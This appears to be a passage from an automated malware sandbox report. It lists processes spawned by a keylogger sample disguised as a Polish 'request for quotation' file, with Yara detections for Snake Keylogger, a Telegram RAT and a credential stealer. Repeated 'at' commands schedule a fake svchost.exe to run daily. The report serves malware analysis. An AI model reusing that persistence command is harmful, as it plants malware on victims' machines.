                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:08:07:56
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                    Start time:08:07:56
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "
                                                                                                                                                                                                                                                    Imagebase:0xb10000
                                                                                                                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                    Start time:08:07:57
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                    Start time:08:07:58
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:42
